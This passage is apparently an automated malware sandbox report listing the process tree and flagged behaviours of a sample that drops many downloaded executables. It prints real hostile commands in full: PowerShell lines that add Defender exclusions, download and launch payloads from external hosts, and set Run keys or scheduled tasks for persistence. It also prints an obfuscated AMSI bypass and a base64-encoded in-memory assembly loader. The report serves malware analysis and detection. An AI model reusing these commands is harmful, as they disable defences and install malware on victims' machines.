http185.196.8.137tesgs.exe.exe 117 PID 3580 wrote to memory of 2508 3580 http185.196.8.137tesgs.exe.exe 117 PID 2508 wrote to memory of 1364 2508 wscript.exe 110 PID 2508 wrote to memory of 1364 2508 wscript.exe 110 PID 2508 wrote to memory of 1364 2508 wscript.exe 110 PID 2724 wrote to memory of 884 2724 http185.215.113.66pei.exe.exe 112 PID 2724 wrote to memory of 884 2724 http185.215.113.66pei.exe.exe 112 PID 2724 wrote to memory of 884 2724 http185.215.113.66pei.exe.exe 112 PID 1364 wrote to memory of 2692 1364 cmd.exe 116 PID 1364 wrote to memory of 2692 1364 cmd.exe 116 PID 1364 wrote to memory of 2692 1364 cmd.exe 116 PID 928 wrote to memory of 780 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 119 PID 928 wrote to memory of 780 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 119 PID 928 wrote to memory of 780 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 119 PID 1968 wrote to memory of 3824 1968 http185.215.113.66newtpp.exe.exe 122 PID 1968 wrote to memory of 3824 1968 http185.215.113.66newtpp.exe.exe 122 PID 1968 wrote to memory of 3824 1968 http185.215.113.66newtpp.exe.exe 122 PID 1364 wrote to memory of 4776 1364 cmd.exe 187 PID 1364 wrote to memory of 4776 1364 cmd.exe 187 PID 1364 wrote to memory of 4776 1364 cmd.exe 187 PID 2548 wrote to memory of 4652 2548 powershell.exe 131 PID 2548 wrote to memory of 4652 2548 powershell.exe 131 PID 2548 wrote to memory of 4652 2548 powershell.exe 131 PID 3076 wrote to memory of 1984 3076 httpguatemalacayerealestate.combatushkainte.exe.exe 134 PID 3076 wrote to memory of 1984 3076 httpguatemalacayerealestate.combatushkainte.exe.exe 134 PID 3076 wrote to memory of 1984 3076 httpguatemalacayerealestate.combatushkainte.exe.exe 134 PID 1984 wrote to memory of 4336 1984 cmd.exe 141 PID 1984 wrote to memory of 4336 1984 cmd.exe 141 PID 1984 wrote to memory of 4336 1984 cmd.exe 141 PID 1968 wrote to memory of 3928 1968 http185.215.113.66newtpp.exe.exe 139 PID 1968 wrote to memory of 3928 1968 http185.215.113.66newtpp.exe.exe 139 PID 1968 wrote to memory of 3928 1968 http185.215.113.66newtpp.exe.exe 139 PID 2548 wrote to memory of 1576 2548 powershell.exe 140 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2524
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\3013831348.exeC:\Users\Admin\AppData\Local\Temp\3013831348.exe3⤵
- Executes dropped EXE
PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\1002628022.exeC:\Users\Admin\AppData\Local\Temp\1002628022.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\275354733.exeC:\Users\Admin\AppData\Local\Temp\275354733.exe4⤵
- Executes dropped EXE
PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\667029277.exeC:\Users\Admin\AppData\Local\Temp\667029277.exe4⤵
- Executes dropped EXE
PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\3216420798.exeC:\Users\Admin\AppData\Local\Temp\3216420798.exe4⤵
- Executes dropped EXE
PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\2770021532.exeC:\Users\Admin\AppData\Local\Temp\2770021532.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\1793913919.exeC:\Users\Admin\AppData\Local\Temp\1793913919.exe3⤵
- Executes dropped EXE
PID:5180
-
-
C:\Users\Admin\AppData\Local\Temp\2321415439.exeC:\Users\Admin\AppData\Local\Temp\2321415439.exe3⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;3⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\system32\timeout.exe" /t 15⤵
- Delays execution with timeout.exe
PID:5560
-
-
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"5⤵
- Executes dropped EXE
PID:4320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\UndLdl.ps1' -Encoding UTF8"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\UndLdl.ps1"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 6127⤵
- Program crash
PID:5484
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7403⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7483⤵
- Program crash
PID:1456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 8243⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7843⤵
- Program crash
PID:2636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 9603⤵
- Program crash
PID:2256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 9923⤵
- Program crash
PID:3632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 13323⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 13643⤵
- Program crash
PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe"C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe"2⤵
- Executes dropped EXE
PID:3728
-
-
C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe"C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;3⤵PID:1368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\system32\timeout.exe" /t 15⤵
- Delays execution with timeout.exe
PID:3348
-
-
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"5⤵
- Executes dropped EXE
PID:3088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:6112
-
-
C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe"C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5888
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4776
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe"2⤵
- Executes dropped EXE
PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exeC:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause4⤵PID:5728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe"2⤵
- Executes dropped EXE
PID:5824
-
-
C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe"2⤵
- Executes dropped EXE
PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe"2⤵
- Executes dropped EXE
PID:5284
-
-
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6124 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"3⤵
- Creates scheduled task(s)
PID:5832
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"3⤵PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp47FC.tmp.bat""3⤵PID:4572
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:5972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe"2⤵
- Executes dropped EXE
PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe"2⤵
